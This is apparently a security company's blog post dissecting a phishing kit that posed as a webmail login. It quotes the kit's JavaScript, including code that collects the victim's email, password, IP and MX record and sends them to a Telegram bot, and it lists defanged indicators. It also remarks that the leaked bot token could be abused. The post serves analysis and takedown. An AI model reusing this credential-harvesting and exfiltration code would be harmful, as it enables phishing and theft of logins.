2025 has just begun, and scammers aren’t taking any breaks. Earlier today, a new phishing campaign landed in our support ticketing inbox. At first glance, we assumed it was a continuation of the Zhong Stealer campaign—but this one was different.
“Account suspension notification”, read the ticket, sent by someone impersonating one of our admins. Despite the absurd claim—and the equally absurd method of delivering it—we immediately began investigating.
The Phisher Muppet
Our scammer used a website hosted on Google Appspot that posed as a login form.
A quick look at the URL revealed that we could manipulate it to modify the form and tailor it for other potential victims. Parsing arguments from a URL? That’s a muppet way to do things.
This behaviour is driven by this small code snippet, which extracts the domain (everything after the “@” symbol) and displays it as the company the form supposedly belongs to:
var ind = my_ai.indexOf("@");                    // position of "@" in the e-mail address taken from the URL
var m_slic = my_ai.substr(ind + 1);              // everything after "@": the victim's domain
var c = m_slic.substr(0, m_slic.indexOf('.'));   // first label of the domain, shown as the "company"
var fnll = c.toLowerCase();
var fllu = c.toUpperCase();
var browser = GetBrowserandLanguage()[0];
Resorting to client-side code like JavaScript to reflect content on a phishing page? That sounds like a muppet move. This is a clear indicator of inexperience, so let’s take a closer look at the rest of the code—there’s a good chance we’ll uncover more clues.
var f = "bmV4dC5waHA=";                          // Base64 for "next.php"
$('#sub_btn').click(function (event) {
$('#errror').hide();
[...]
“next.php” encoded in Base64. Let’s see what’s next:
var message = "-+ General Webmail ReZulT +=\n";
message += "Email: " + ai + "\n";
message += "Password: " + pr + "\n";
message += "Browser : " + GetBrowserandLanguage()[0] + "\n";
message += "Language: " + GetBrowserandLanguage()[1] + "\n";
message += "MX Record: " + await getMXRecord(domain) + "\n";
message += "IP Address : " + ip + "\n";
message += "Date: " + date + "\n";
message += "---+ General Webmail ReZulT +---\n";
var token = "73[REDACTED]rI";
var chatId = "1[REDACTED]6";
dataType: 'JSON',
url: `https://api.telegram.org/bot${token}/sendMessage`,
type: 'POST',
data: {
[...]
So, our Threat Stuntman (he clearly isn’t quite an actor) left a plaintext Telegram Bot Token and a Telegram Chat ID in the code.
Base64-encoded strings, client-side tokens, “ReZulT” l33t speak, URL-based constructions…
Let’s see what happens backstage.
Muppet Pest Control (A subsidiary of Threat Punchers INC)
Backstage, the Muppet first fetches our IP address information from ipinfo.io, a classic move.
Then it tries to resolve the MX DNS record using Google’s services.
Next, all the gathered information, credentials included, is sent as a Telegram message, once again exposing the Bot Token and the Chat ID.
Now, if we were bad people (and we are not), we could have just grabbed the Bot Token and started spamming content on its behalf. By modifying the text parameter, we can literally send anything under the Bot’s name.
Now, if we were really bad people (again, we are not), we could also change the chat_id parameter and start spamming anyone with any content under the Bot’s name.
Let’s try to find out who handles this Bot and who it is relaying information to. We can do so with Telegram’s API.
And there it is—our Muppet and the puppeteer behind it.
Now comes our favourite part: the flamethrower. Let’s burn down their accounts, starting with reports to their providers, followed by our Brand Protection solutions to speed up the process and keep the issue under control.
Another day, another burnt phishing infra. Now we can freely enjoy the rest of our Friday.
Thanks for reading, and don’t go on a fishing trip without your muppet repellent.
IOCs
URL: https://firebasestorage.googleapis[.]com/v0/b/aloneatprom-7fde1.appspot.com/o/gb%2Funiversal.html?alt=media&token=93f4ac80-4eae-4cd1-8b68-294631c8c821#ayuda@bitso.com
Telegram Bot: @Slimkudibot